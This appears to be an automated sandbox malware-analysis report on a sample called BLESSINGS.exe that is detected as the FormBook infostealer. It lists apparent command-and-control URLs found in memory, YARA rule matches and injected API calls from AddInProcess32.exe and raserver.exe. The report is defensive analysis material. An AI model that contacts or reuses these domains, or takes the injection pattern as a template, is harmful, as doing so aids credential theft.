          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gabriellagullberg.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gabriellagullberg.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.download/jqc/www.internetmarkaching.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.hotvidzhub.downloadReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.com/jqc/www.gabriellagullberg.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.internetmarkaching.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.com/jqc/www.screwtaped.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.kornteengoods.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.margosbest.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.margosbest.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.margosbest.com/jqc/www.the343radio.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.margosbest.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/www.hotvidzhub.download
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.com/jqc/www.novergi.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.quintred.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.asacal.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.droriginals.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.quintred.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: raserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lande
          Source: BLESSINGS.exe, 00000001.00000002.422231496.0000000001180000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419D60 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419E10 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419E90 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419D5D NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419E0B NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419E8A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017799D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017795F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01779610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04569730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0456A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9E90 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9D5D NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9E0B NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9E8A NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_001E9F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054609C8
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054610F8
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05462260
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_05463A28
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054626D8
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054548A2
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_054563AB
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_01174030
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_01179A69
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117A561
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117BC90
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117D752
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_01177750
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_01174798
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117EEC2
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117F6C0
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 1_2_0117F6B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041D8D2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041E197
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041D313
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041D63C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00409E3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041DF97
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0041DFAA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_00B62050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173F900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018020A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018028EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180E824
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174B090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F03DA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01802B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FDBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176EBB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018022AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01730D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018025DD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01802D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01801D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FD466
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180DFCE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01801FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01756E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FD616
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01802EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04520D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04546E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455EBB0
